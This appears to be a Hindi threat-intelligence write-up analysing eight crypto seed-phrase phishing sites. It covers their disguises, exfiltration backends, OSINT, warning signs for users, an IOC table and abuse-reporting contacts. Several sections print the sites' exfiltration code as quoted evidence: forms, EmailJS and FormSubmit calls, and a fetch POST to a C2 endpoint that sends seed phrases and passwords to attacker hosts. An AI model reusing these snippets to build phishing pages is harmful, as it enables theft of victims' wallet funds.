समाचार पर वापस
गहन जाँच

क्रिप्टो फ़िशिंग की संरचना:
8 वास्तविक हमलों का विश्लेषण

हमने लाइव फ़िशिंग ट्रैफ़िक को इंटरसेप्ट किया, 5 सीड फ़्रेज़ स्टीलर्स का रिवर्स-इंजीनियरिंग किया, और चोरी किए गए डेटा का पता टेलीग्राम बॉट्स, EmailJS खातों, और फ़िशिंग-एज़-ए-सर्विस बैकएंड्स तक लगाया।

२७ मार्च, २०२६ फिशडिस्ट्रॉय रिसर्च 18 मिनट में पढ़ें
क्रिप्टो फ़िशिंग जांच की संरचना
रोके गए फ़िशिंग ट्रैफ़िक का लाइव विश्लेषण पूरे हमले के बुनियादी ढांचे को उजागर करता है।
8विश्लेषित साइटें
7निकास विधियाँ
1,824+चोरी किए गए क्रेडेंशियल
380+वॉलेट ब्रांड्स
$0आक्रमणकर्ता लागत

हमने क्या पाया

हर दिन, हजारों क्रिप्टोकरेंसी उपयोगकर्ता अपनी फंड्स उन फ़िशिंग साइटों पर खो देते हैं जो वैध वॉलेट सेवाओं से अलग नहीं दिखतीं। लेकिन क्या होता है पीछे नकली "कनेक्ट वॉलेट" बटन? आपकी सीड फ़्रेज़ असल में कहाँ जाती है?

हमने 5 सक्रिय फ़िशिंग साइटों से लाइव HTTP ट्रैफ़िक इंटरसेप्ट किया, उनका पूरा सोर्स कोड डाउनलोड किया, और प्रत्येक डेटा एक्सफ़िल्ट्रेशन एंडपॉइंट को उसकी अंतिम मंज़िल तक ट्रेस किया। यह जांच आधुनिक क्रिप्टो फ़िशिंग की पूरी संरचना को उजागर करती है — उन सोशल इंजीनियरिंग तरकीबों से लेकर जो आपको अपना सीड फ़्रेज़ टाइप करने के लिए प्रेरित करती हैं, उस टेलीग्राम बॉट तक जो इसे रीयल-टाइम में हमलावर तक पहुंचाता है।

अस्वीकरण

इस लेख में दिखाए गए सभी सीड वाक्यांश यादृच्छिक रूप से उत्पन्न परीक्षण डेटा हैं। इस जांच के दौरान कोई वास्तविक क्रेडेंशियल समझौता नहीं हुआ। सभी साइटों की रिपोर्ट उनके संबंधित होस्टिंग प्रदाताओं और दुरुपयोग विभागों को कर दी गई है।

सार्वभौमिक आक्रमण पैटर्न

अलग-अलग ब्रांडिंग और बैकएंड के बावजूद, सभी 8 फ़िशिंग साइटें का पालन करती हैं बिल्कुल वही मनोवैज्ञानिक फ़नल:

लैंडिंग पेजविश्वास निर्माण
वॉलेट चयनकर्ता60–110+ लोगो
नकली "कनेक्टिंग..."3–5 सेकंड का टाइमर
कनेक्शन विफल हो गयाहमेशा विफल होता है
मैनुअल प्रविष्टिबीज / कुंजी / कुंजीस्टोर
बाह्य निकासीटीजी / ईमेल / एपीआई

महत्वपूर्ण अंतर्दृष्टि: "कनेक्टिंग..." एनिमेशन हमेशा विफल होने के लिए हार्डकोड किया गयासाइट #4 के स्रोत कोड में, हमें मिला const success = false — वॉलेट कनेक्शन का कोई प्रयास नहीं है। यह पूरा प्रवाह केवल पीड़ितों को "मैन्युअली कनेक्ट करें" फॉर्म की ओर धकेलने के लिए मौजूद है।

छह-चरणीय क्रिप्टो फ़िशिंग हमले की श्रृंखला
हमारे द्वारा विश्लेषण की गई सभी फ़िशिंग साइटों द्वारा साझा की जाने वाली सार्वभौमिक 6-चरणीय हमला श्रृंखला

8 स्थल: पूरा विवरण

1
नेटवर्क परत प्रोटोकॉल
नेटवर्कलेयर्स.पेजेस.डेव
प्रत्यक्षक्लाउडफ्लेयर पेजेज़टेलीग्राम बॉट + ईमेलजेएस

भेषधारण

वॉलेट सत्यापन के लिए एक काल्पनिक "विकेंद्रीकृत प्रोटोकॉल"। विश्वसनीयता के लिए यह लाइव CryptoCompare प्राइस टिकर और वास्तविक ब्लॉकचेन एक्सप्लोरर्स (इथेरियम, BSC, पॉलीगॉन, एवलान्च, सोलैना, कार्डानो) के लिंक का उपयोग करता है। लैंडिंग पेज में 100+ वॉलेट लोगो और 3-चरणीय "प्रमाणीकरण" प्रक्रिया शामिल है।

द्वैध निकासी श्रृंखला

सबसे परिष्कृत बैकएंड 5 में से — हर चोरी की गई क्रेडेंशियल इसके माध्यम से भेजी जाती है दो स्वतंत्र चैनल एक साथ:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

ओएसआईएनटी निष्कर्ष

सूचकमूल्य
ठग का ईमेलBestgrace309@gmail.com
टेलीग्राम बॉट@DewdropsTG_bot (आईडी: 7567323692)
टेलीग्राम प्राप्तकर्ता@metatech2 (चैट आईडी: 7350941887)
बैकएंडईमेलजेएस-बैकएंड-ओवीटीजी.ऑनरेंडर.कॉम
ईमेलजेएस सेवाservice_d5qigxs / template_7bqxeaa
छिपा हुआ डोमेनलेयरचेन.इन (सीएफ ईमेल अस्पष्टता से)
भेजे गए संदेश1,824+ (टेलीग्राम मैसेज_id से)
डोमेन आयु2 दिन (TLS: 25 मार्च, 2026)
ओपीसेक विफलता

हमलावर का ईमेल एक में पाया गया था। जावास्क्रिप्ट टिप्पणी अंदर config.js: // Bestgrace309@gmail.com. उन्होंने इसे तैनात करने से पहले हटाना भूल गए। इसके अतिरिक्त, टेलीग्राम रिले बैकएंड पूरी तरह से खुला है — कोई प्रमाणीकरण नहीं, कोई दर सीमा नहीं। क्लाउडफ्लेयर के डीकोड करके data-cfemail HTML में obfuscation, हमने एक छिपा हुआ ईमेल भी उजागर किया: support@layerschain.in, भारतीय और दक्षिण अफ्रीकी होस्टिंग अवसंरचना से जुड़ता हुआ।

2
एक्ला टोकन माइग्रेशन
token-aqla.pages.dev
प्रत्यक्षक्लाउडफ्लेयर पेजेज़गैर-स्थिर फ़ॉर्म

भेषधारण

वास्तविक की एक पिक्सेल-परफेक्ट खरोंच एक्वालिब्रे (एक्ला) टोकन माइग्रेशन पृष्ठ। HTML में एक मेटाडेटा टैग है जो स्रोत प्रकट करता है: data-scrapbook-source="https://token.aqla.app/migration", 19 नवंबर, 2024 को समय-मुद्रित।

शून्य-कोड दृष्टिकोण

इस आक्रमणकारी को आवश्यकता है शून्य सर्वर-साइड कोड. फ़ॉर्म सीधे को पोस्ट करता है गैर-स्थिर — स्थिर साइटों के लिए एक वैध फॉर्म बैकएंड। हर सबमिशन को ठग के ईमेल पर भेज दिया जाता है। हमलावर का ईमेल है सोर्स कोड में कभी भी दिखाई नहीं देता.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
लागत: $0

Cloudflare Pages: मुफ़्त। अन-स्टैटिक फ़ॉर्म्स: मुफ़्त। कोई डोमेन खरीदे नहीं गए। कोई सर्वर किराए पर नहीं लिए गए। कुल बुनियादी ढांचे की लागत: शून्य डॉलर.

3
सेफपाल टाइपोस्क्वाट
antiresolve-mysafpalnode.pages.dev
प्रत्यक्ष क्लाउडफ्लेयर पेजेज़ गैर-स्थिर फ़ॉर्म

भेषधारण

सबडोमेन में " शामिल हैसेफपाल— का एक जानबूझकर किया गया गलत वर्तनीकरण सेफपाल, एक लोकप्रिय हार्डवेयर वॉलेट। साइट 26 नकली समस्या श्रेणियों के साथ "ब्लॉकचेन वॉलेट सुधार" के रूप में प्रस्तुत होती है। यह चेन नामों (इथेरियम, बीएससी, पॉलीगॉन...) को एनिमेट करने के लिए टाइप्ड.जेएस और विश्वसनीयता के लिए लाइवकॉइनवॉच टिकर का उपयोग करती है।

वही किट, वही ऑपरेटर?

का उपयोग करता है बिल्कुल वही फ़िशिंग टेम्पलेट साइट #2 के रूप में: समान connect.html, एकसमान wallets.html 60+ लोगो के साथ, वही अन-स्टैटिक बैकएंड (अलग फॉर्म आईडी — 6f1b82c3...da9943af). समान किट दृढ़ता से सुझाव देती है एक ऑपरेटर दोनों साइटें चला रहा है.

कोड में चेतावनी संकेत: "Privay Policy" (एक 'c' गायब), "seperated" (होना चाहिए "separated"), "Kestore" (एक 'y' गायब)। पासवर्ड फ़ील्ड का उपयोग करता है type="text" के बजाय type="password".

4
फ्लेयर नेटवर्क क्लोन
flaremainnet.pages.dev
प्रत्यक्षक्लाउडफ्लेयर पेजेज़डुअल ईमेलजेएस (अतिरिक्तता)

भेषधारण

के एक लगभग-परिपूर्ण क्लोन फ्लेयर नेटवर्क पोर्टल — एक वास्तविक लेयर-1 EVM ब्लॉकचेन, जिसमें FTSO और डेटा कनेक्टर प्रोटोकॉल शामिल हैं। यह 30+ इकोसिस्टम पार्टनर्स, नेविगेशन और ब्रांडिंग को प्रतिकृति करता है। फेविकॉन्स एक टाइपोस्क्वाट से लोड किए गए हैं: portal.flaremainet.com (mainnet से एक 'n' गायब है)।

Dual EmailJS रिडंडेंसी

एकमात्र साइट जो उपयोग कर रही है एक साथ दो अलग-अलग EmailJS खाते हटाए जाने के खिलाफ अतिरिक्त सुरक्षा के लिए:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

हर चोरी के लिए ईमेल विषय: "New Wallet Details from Flare".

यह एक वित्त पोषित व्यवसाय है।

HTML में शामिल हैं गूगल टैग मैनेजर (GTM-WX2D2TR), माइक्रोसॉफ्ट क्लैरिटी (j4bllybjkp), लुनियो पीपीसी सुरक्षा, और एक ट्विटर/एक्स विज्ञापन पिक्सेल. हमलावर भाग रहा है भुगतान विज्ञापन पीड़ितों को फ़िशिंग साइट पर ले जाने और बॉट क्लिकों को फ़िल्टर करने के लिए। यह कोई शौक नहीं है — यह एक वित्त पोषित अभियान है जिसमें एनालिटिक्स और विज्ञापन खर्च शामिल हैं।

Flare Network फिशिंग साइट डुअल EmailJS और सशुल्क विज्ञापन के साथ
साइट #4: सशुल्क विज्ञापन, विश्लेषण ट्रैकिंग, और दोहरी निकासी — सबसे पेशेवर अभियान
5
कॉइन नोड / वॉलेट फिक्स (PhaaS)
swiftauthapps.pages.dev
बैकएंड बंदपल्सरिज़ॉल्व एपीआई (फास)

भेषधारण

एक सामान्य "COIN NODE" / "Wallet Fix" सेवा (कोई विशिष्ट ब्रांड नहीं)। कॉपीराइट "Wallet Fix 2022" — यह किट टेम्पलेट कम से कम 4 साल पुराना है। छवियाँ होस्ट की गई हैं pumpeth.com (WordPress ऑन AWS).

फ़िशिंग-एज़-ए-सर्विस

सबसे चिंताजनक बैकएंड आर्किटेक्चर: एक यूयूआईडी-आधारित बहु-किरायेदार एपीआई:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

प्रत्येक ठग को अपना स्वयं का UUID एंडपॉइंट मिलता है। एक केंद्रीय ऑपरेटर API का रखरखाव करता है, अभियानों पर नज़र रखता है, और संभवतः चोरी किए गए धन का एक हिस्सा लेता है। यह है औद्योगिकीकृत क्रिप्टो चोरी — एक फ़िशिंग-एज़-ए-सर्विस मॉडल।

संबंधित अवसंरचना (अधिकांशतः निष्क्रिय)

डोमेनभूमिकास्थिति
एपीआई.पल्सरेसॉल्व.कॉमएक्सफिल्ट्रेशन एपीआईएनएक्सडीओएमेन
वॉलेटइश्यूज़फिक्स.नेटफ़ैविकॉन होस्टएनएक्सडीओएमेन
सिंकवॉलेट डॉट ऑनलाइनलोगो होस्टएनएक्सडीओएमेन
पम्पैथ.कॉमछवि सीडीएनलाइव (एडब्ल्यूएस)
ज़ॉम्बी फ्रंटएंड

बैकएंड बंद है, लेकिन फ्रंटएंड अभी भी लाइव है क्लाउडफ्लेयर पेजेज़ पर। यदि हमलावर पुनः पंजीकरण करता है pulseresolve.com, साइट तुरंत फिर से चालू हो जाती है।

6
समर्थन केंद्र + लेजर पुनर्प्राप्ति
wallet-support-39n.pages.dev और ledger-recovery.support
प्रत्यक्षक्लाउडफ्लेयर पेजेज़ + रिप्लिटकस्टम C2 एपीआईBIP39 स्व-पूर्ति

भेषधारण

A दोहरा अभियान: एक सामान्य "समर्थन केंद्र" पर wallet-support-39n.pages.dev 15 नकली जारी श्रेणियों और 39 वॉलेट ब्रांडों के साथ, साथ ही एक पिक्सेल-परफेक्ट लेजर ऑनबोर्डिंग क्लोन पर ledger-recovery.support Replit पर होस्ट किया गया — डिवाइस मॉडल चयन, पिन सेटअप, और 24-शब्दों वाले सीड वाक्यांश ग्रिड के साथ वास्तविक BIP39 स्वतः-पूर्ति.

एंटी-स्कैनर C2 बैकएंड

वॉलेट सपोर्ट पेज चोरी किया गया डेटा को भेजता है api.uranustoken.org/log — क्लाउडफ्लेयर के पीछे एक कस्टम nginx/Ubuntu C2। बैकएंड जानबूझकर सभी GET अनुरोधों को ड्रॉप करता है (522 टाइमआउट लौटाता है), केवल POST पर प्रतिक्रिया करता है। इसका मतलब है कि URL स्कैनर, Google Safe Browsing क्रॉलर और सुरक्षा शोधकर्ता GET के साथ एंडपॉइंट को पिंग करने पर कुछ भी नहीं देखते — C2 निष्क्रिय प्रतीत होता है।

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

लेजर क्लोन Replit पर ही एक अलग Express.js बैकएंड चलाता है: POST /api/recovery-phrase एकत्र करना {deviceId, pin, phrase}. यह लौटता है 400 {"error":"Invalid data provided"} खराब इनपुट पर — यह पुष्टि करते हुए कि बैकएंड है जीना और सक्रिय रूप से सत्यापित करना चोरी किया गया डेटा।

ओएसआईएनटी निष्कर्ष

सूचकमूल्य
फ्रंटएंड (वॉलेट)wallet-support-39n.pages.dev
फ्रंटएंड (लेजर)लेजर-रिकवरी.सपोर्ट (34.111.179.208)
सी2 बैकएंड एपीआई.उरानुस्टोकन.ऑर्ग → एनजीआईएनएक्स/1.24.0 उबंटू
सी2 आईपीज़104.21.60.163 / 172.67.198.35 (क्लाउडफ्लेयर)
रिप्लिट सत्यापित करेंa43d3852-5304-47af-a61b-f0f6f3912736
पंजीयकName.com (ledger-recovery.support)
तैनात9 जनवरी, 2026 (अंतिम-संशोधित हेडर)
तकनीकी ढांचा रिएक्ट + वाइट + टेलविंड v4.1 + फ्रेमर मोशन
अत्युच्च यूएक्स निष्ठा

466 KB का JS बंडल में शामिल है पूर्ण BIP39 शब्द सूची रियल-टाइम ऑटो-कम्प्लीट के लिए, "पासफ्रेज" के 67 संदर्भ, "मनोनोनिक" के 39। लेजर क्लोन पीड़ितों को बिल्कुल असली लेजर डिवाइस के समान ऑनबोर्डिंग फ्लो से गुज़रवाता है — इस पूरी जांच में सबसे विश्वसनीय फ़िशिंग पेज। apiKey कॉन्फ़िग में फ़ील्ड एक का सुझाव देती है मल्टी-टेनेंट PhaaS वास्तुकला.

7
विकेंद्रीकृत लॉन्चपैड
मेननेटप्रमाणीकरणऐप.पेजेस.डेव
प्रत्यक्षक्लाउडफ्लेयर पेजेज़फ़ॉर्म सबमिट डॉट कॉ

भेषधारण

एक सामान्य "विकेंद्रीकृत लॉन्चपैड" के साथ 21 चारा श्रेणियाँ (स्टेकिंग, माइग्रेशन, केवाईसी, गिवअवे, पुरस्कार क्लेम, संपत्ति वसूली, प्री-सेल, एनएफटी मिंट, लॉक्ड खाते...) और 70+ वॉलेट ब्रांड्स — यह उन सबसे व्यापक वॉलेट सूचियों में से एक थी जिनका हमने सामना किया। स्पष्ट रूप से झलकने वाली टाइपो "Sychronize" (एक 'n' की कमी) नकली होने का भंडाफोड़ करती है।

फ़ॉर्मसबमिट Pipeline

उपयोग फ़ॉर्म सबमिट डॉट कॉ — एक वैध फॉर्म-से-ईमेल सेवा। एंडपॉइंट हैश a2cf4131f1a5d39453c7c183df96f86f यह ठग के ईमेल पते का MD5 है। हमने Gmail, Yahoo, Hotmail, ProtonMail, Yandex और Mail.ru पर सैकड़ों ईमेल पैटर्न को ब्रूट-फोर्स किया — कोई मेल नहींठग एक असामान्य या यादृच्छिक रूप से उत्पन्न ईमेल का उपयोग करता है।

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

ओएसआईएनटी निष्कर्ष

सूचकमूल्य
डोमेनमेननेटप्रमाणीकरणऐप.पेजेस.डेव
फ़ॉर्म सबमिट हैशa2cf4131f1a5d39453c7c183df96f86f
अभियान आईडीडेप विकेंद्रीकृत
फ़ॉन्टावesome किटbdc3291137 (किट #112310842, मुफ्त v6.7.2)
जेक्वेरी3.2.1 + 3.5.1 एक साथ लोड
बूटस्ट्रैपसीएसएस 5.2.2 + जेएस 5.3.0-अल्फा1 (अनुपालनहीनता)
दो ट्रैकिंग हैंडल

फ़ॉन्टावesome किट bdc3291137 — FontAwesome इस किट आईडी के पीछे के खाते के मालिक की पहचान कर सकता है। अभियान टैग DAPP DECENTRALIZED एक ही FormSubmit हैश का उपयोग करके अन्य फ़िशिंग साइटों पर भी दिखाई दे सकता है। सीड वाक्यांश चुराने के बाद, एक नकली क्यूआर कोड और यादृच्छिक 7-अक्षर का संदर्भ कोड प्रदर्शित किया जाता है: "अपने अद्वितीय रेफ़ कोड के साथ एडमिन से संपर्क करें" — जांच करने के बजाय पीड़ितों को इंतजार में रखा जाता है।

8
आर2 बकेट + पीएचपी होम कंप्यूटर पर
pub-519769e9eb634616b1746c2018641d56.r2.dev
मृतक्लाउडफ्लेयर आर2PHP + डीडीएनएस

भेषधारण

अज्ञात — फ्रंटएंड और बैकएंड दोनों ऑफ़लाइन हैं। पेलोड संरचना के आधार पर, यह एक क्रिप्टो वॉलेट सीड फ़्रेज़ स्टीलर था। क्लाउडफ्लेयर R2 सार्वजनिक बकेट (ऑब्जेक्ट स्टोरेज, पेज नहीं) एक है अच्छी तरह से प्रलेखित फ़िशिंग माध्यम 5,000+ दुर्भावनापूर्ण पृष्ठों की पहचान और Netskope द्वारा 61 गुना ट्रैफ़िक वृद्धि की सूचना के साथ।

स्क्रिप्ट किडी सेटअप

सबसे अधिक मूलभूत क्रिया इस संग्रह में। सीड वाक्यांश भेजे जाते हैं। शब्द-शब्द मुफ्त डायनामिक डीएनएस के पीछे एक होम कंप्यूटर या वीपीएस पर चलने वाली एक PHP स्क्रिप्ट:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

ओएसआईएनटी निष्कर्ष

सूचकमूल्य
फ्रंटएंड pub-519769e9eb634616b1746c2018641d56.r2.dev [ऑफ़लाइन]
बैकएंड दयालुजिग्गा4रियल123.पब्लिकवीएम.कॉम [एनवाईडीोमेन]
आर2 बकेट आईडी519769e9eb634616b1746c2018641d56
डीडीएनएस प्रदाता DNSExit.com / नेटडॉर्म, इंक. (सिनसिनाटी, ओहायो)
डीएनएस एनएसns10–13.dnsexit.com
उपयोगकर्ता नामदयालुजिग्गावास्तविक123
यूज़रनेम OSINT: mercifuljigga4real123

"दयालु" + "जिगा" (जे-ज़ेड का उपनाम) + "4real" + "123" — एक विशिष्ट रूप से व्यक्तिगत हैंडल जो हिप-हॉप संस्कृति के प्रति लगाव को दर्शाता है। नहीं मिला किसी भी इंडेक्स्ड प्लेटफ़ॉर्म पर: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch, या Steam। संभवतः Discord, Telegram, या गेमिंग प्लेटफ़ॉर्म पर इस नाम या इसके निकट समान नामों के तहत सक्रिय। फ़ाइल का नाम fuc.php हैंडल की बेबाक शैली से मेल खाता है।

आपके सीड फ़्रेज़ को चुराने के 7 तरीके

चार क्रिप्टो फ़िशिंग डेटा एक्सफिल्ट्रेशन तरीकों की तुलना
8 फ़िशिंग साइटों पर सात अलग-अलग एक्सफ़िल्ट्रेशन आर्किटेक्चर का उपयोग किया गया।
विधिसाइटेंयह कैसे काम करता हैगतिलागत
टेलीग्राम बॉट#1 Render.com पर Express.js Bot API को प्रॉक्सी करता है। ठग को क्रेडेंशियल्स के साथ तुरंत डीएम मिलता है। वास्तविक समय$0
ईमेलजेएस#1, #4 क्लाइंट-साइड जावास्क्रिप्ट सीधे EmailJS API को भेजता है, जो ठग के ईमेल पर भेजता है। लगभग 1 मिनट$0
गैर-स्थिर फ़ॉर्म#2, #3 मानक HTML फ़ॉर्म POST एक वैध फ़ॉर्म सेवा को जो सबमिशन को ईमेल के माध्यम से अग्रेषित करती है। लगभग 1 मिनट$0
फ़ॉर्म सबमिट डॉट कॉ#7 jQuery AJAX से FormSubmit.co तक। ईमेल पता MD5 हैश के पीछे छिपा हुआ है। अभियान को "DAPP DECENTRALIZED" के रूप में टैग किया गया है। लगभग 1 मिनट$0
कस्टम C2 एपीआई#6 React SPA Cloudflare के पीछे nginx/Express API को भेजता है। ड्रॉप्स GET अनुरोध (522) स्कैनरों से बचने के लिए। केवल POST पर प्रतिक्रिया करता है। वास्तविक समय~$5/माह
PHP + डीडीएनएस#8 नि:शुल्क डायनामिक डीएनएस (publicvm.com) के माध्यम से घरेलू कंप्यूटर पर PHP स्क्रिप्ट। सीड वाक्यांश शब्द-दर-शब्द भेजा गया। वास्तविक समय$0
पीएचएएस एपीआई#5 UUID-आधारित बहु-किरायेदार API। केंद्रीय ऑपरेटर बैकएंड का प्रबंधन करता है, धोखेबाज एंडपॉइंट किराए पर लेते हैं। वास्तविक समयअज्ञात

7 चेतावनी संकेत जो हर फ़िशिंग साइट का भंडाफोड़ करते हैं

अगर आप देखते हैं कोई भी इनमें से, टैब को तुरंत बंद करें:

1. "कनेक्शन विफल" हमेशा नकली होता है

वास्तविक वॉलेट कनेक्शन WalletConnect प्रोटोकॉल या ब्राउज़र एक्सटेंशन का उपयोग करते हैं। वे कभी भी "कनेक्शन विफल" त्रुटि नहीं दिखाते जिसमें आपसे अपना सीड वाक्यांश टाइप करने के लिए कहा जाए।

2. 50–110+ वॉलेट लोगो, एक ही गंतव्य

हर वॉलेट आइकन एक ही फॉर्म पर ले जाता है। एक वास्तविक सेवा प्रत्येक वॉलेट के असली SDK को एकीकृत करेगी।

3. सबमिट करने के बाद "त्रुटि"

सबमिट करने के बाद दिखाया जाने वाला नकली "503 त्रुटि" या "अज्ञात त्रुटि" जानबूझकर किया गया है। आपका डेटा पहले ही चुरा लिया गया था — यह त्रुटि आपको दूसरे वॉलेट के साथ फिर से प्रयास करने के लिए धोखा देती है।

4. .pages.dev पर होस्ट किया गया

सभी 5 साइटें Cloudflare Pages के मुफ्त स्तर का दुरुपयोग करती हैं। पहचान सत्यापन की आवश्यकता नहीं है। Cloudflare Pages पर फ़िशिंग दुरुपयोग 2025 में 198% बढ़ गया।

5. तीन टैब: वाक्यांश / निजी कुंजी / कीस्टोर

कोई भी वैध सेवा को इन तीनों प्रमाण-पत्र प्रकारों की आवश्यकता नहीं होती। यह ट्रिपल-टैब फॉर्म एक फ़िशिंग किट का हस्ताक्षर है।

6. कोई ब्लॉकचेन इंटरैक्शन नहीं

इनमें से कोई भी साइट लोड नहीं हो रही है। ethers.js, web3.js, या कोई RPC कॉल करें। ये शुद्ध HTML फॉर्म हैं जो dApps होने का दिखावा कर रहे हैं।

7. शून्य-लागत अवसंरचना

मुफ्त होस्टिंग + मुफ्त फॉर्म सेवाएँ + मुफ्त संदेश सेवा = $0 में एक पूरा फ़िशिंग ऑपरेशन। यदि साइट का कोई वास्तविक डोमेन नहीं है, तो संदेह करें।

पूर्ण IOC तालिका

सुरक्षा टीमों, खतरे की खुफिया जानकारी प्लेटफ़ॉर्मों, और दुरुपयोग रिपोर्ट करने वालों के लिए:

डोमेन और अवसंरचना

डोमेनप्रकारस्थिति
नेटवर्कलेयर्स.पेजेस.डेवफ़िशिंग फ्रंटएंडप्रत्यक्ष
token-aqla.pages.devफ़िशिंग फ्रंटएंडप्रत्यक्ष
antiresolve-mysafpalnode.pages.devफ़िशिंग फ्रंटएंडप्रत्यक्ष
flaremainnet.pages.devफ़िशिंग फ्रंटएंडप्रत्यक्ष
swiftauthapps.pages.devफ़िशिंग फ्रंटएंडप्रत्यक्ष
ईमेलजेएस-बैकएंड-ओवीटीजी.ऑनरेंडर.कॉमटीजी रिले बैकएंडप्रत्यक्ष
पोर्टल.फ्लैरमेननेट.कॉमटाइपोस्क्वाट संपत्तियाँअज्ञात
लेयरचेन डॉट इनसंबंधित डोमेनडीएनएस बंद
एपीआई.पल्सरेसॉल्व.कॉमपीएचएएस बैकएंडएनएक्सडीओएमेन
वॉलेटइश्यूज़फिक्स.नेटसंपत्ति होस्टएनएक्सडीओएमेन
सिंकवॉलेट डॉट ऑनलाइनलोगो होस्टएनएक्सडीओएमेन
पम्पैथ.कॉमछवि सीडीएनलाइव (एडब्ल्यूएस)
wallet-support-39n.pages.devफ़िशिंग फ्रंटएंडप्रत्यक्ष
लेजर-रिकवरी.सपोर्टलेजर फ़िशिंग (रिप्लिट)प्रत्यक्ष
एपीआई.उरानुस्टोकन.ऑर्गC2 बैकएंड (एनजीआईएनएक्स/उबंटू)प्रत्यक्ष
यूरेनस टोकन डॉट ओआरजीमूल डोमेन404
मेननेटप्रमाणीकरणऐप.पेजेस.डेवफ़िशिंग फ्रंटएंडप्रत्यक्ष
pub-519769e9eb634616b1746c2018641d56.r2.devफ़िशिंग (R2 बकेट)ऑफ़लाइन
दयालुजिग्गा4रियल123.पब्लिकवीएम.कॉमPHP बैकएंड (डीडीएनएस)एनएक्सडीओएमेन

खाते और पहचानकर्ता

प्रकारमूल्यसाइट
ईमेलBestgrace309@gmail.com#1
ईमेल (छिपा हुआ)support@layerschain.in#1
टेलीग्राम बॉट@DewdropsTG_bot (7567323692)#1
टेलीग्राम उपयोगकर्ता@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
ईमेलजेएस #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
ईमेलजेएस #3service_isy47de / JsVEgXVcaSTro1etu#4
गैर-स्थिर फ़ॉर्मc78173e2d991...94c3f76#2
गैर-स्थिर फ़ॉर्म6f1b82c3ce55...da9943af#3
PhaaS यूयूआईडीa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
जीटीएमजीटीएम-डब्ल्यूएक्स2डी2टीआर#4
एमएस क्लैरिटीजे4ब्लिबीजेकेपी#4
रेंडर उदाहरणआरएनडीआर-आईडी: ed83576e-b1b3-4c82#1
रिप्लिट सत्यापित करेंa43d3852-5304-47af-a61b-f0f6f3912736#6
फ़ॉर्म सबमिट एमडी5a2cf4131f1a5d39453c7c183df96f86f#7
अभियान टैगडेप विकेंद्रीकृत#7
फ़ॉन्टावesome किटbdc3291137 (किट #112310842)#7
आर2 बकेट आईडी519769e9eb634616b1746c2018641d56#8
यूज़रनेम/डीडीएनएसदयालुजिग्गावास्तविक123#8

क्रिप्टो फ़िशिंग की रिपोर्ट कहाँ करें

क्रिप्टो फ़िशिंग साइट्स की रिपोर्ट कहाँ करें — बहु-दिशात्मक कार्रवाई
अधिकतम हटाने की गति के लिए होस्टिंग, बैकएंड सेवाओं और मैसेजिंग प्लेटफ़ॉर्म को एक साथ लक्षित करना
सेवाक्या रिपोर्ट करेंकैसे
क्लाउडफ्लेयर7x .pages.dev + 1x R2 बकेटदुरुपयोग.क्लाउडफ्लेयर.कॉम
गूगल सुरक्षित ब्राउज़िंगसभी फ़िशिंग यूआरएलफ़िश की रिपोर्ट करें
फ़िशटैंकसमुदाय ब्लैकलिस्ट के लिए सभी यूआरएलफिशटैंक.ऑर्ग
ईमेलजेएस3 दुरुपयोग किए गए खाते (उपरोक्त सेवा आईडी)abuse@emailjs.com
गैर-स्थिर2 फॉर्म एंडपॉइंट्सun-static.com के माध्यम से संपर्क करें
रेंडर डॉट कॉमटेलीग्राम रिले बैकएंडदुरुपयोग फॉर्म प्रस्तुत करें
टेलीग्राम@DewdropsTG_bot + @metatech2telegram.org/support
गूगल (जीमेल)Bestgrace309@gmail.comGoogle दुरुपयोग रिपोर्ट
ट्विटर/एक्सविज्ञापन खाता साइट #4 का प्रचार कर रहा हैX विज्ञापनों दुरुपयोग रिपोर्ट
फ़ॉर्म सबमिट डॉट कॉहैश a2cf4131... (#7)फ़ॉर्म सबमिट दुरुपयोग फ़ॉर्म
रिप्लिटलेजर-रिकवरी.सपोर्ट (#6)रिप्लिट दुरुपयोग रिपोर्ट
नाम.कॉमledger-recovery.support के लिए रजिस्टर करेंName.com दुरुपयोग
डीएनएसएक्जिटदयालुजिग्गा4रियल123.पब्लिकवीएम.कॉमdnsexit.com दुरुपयोग
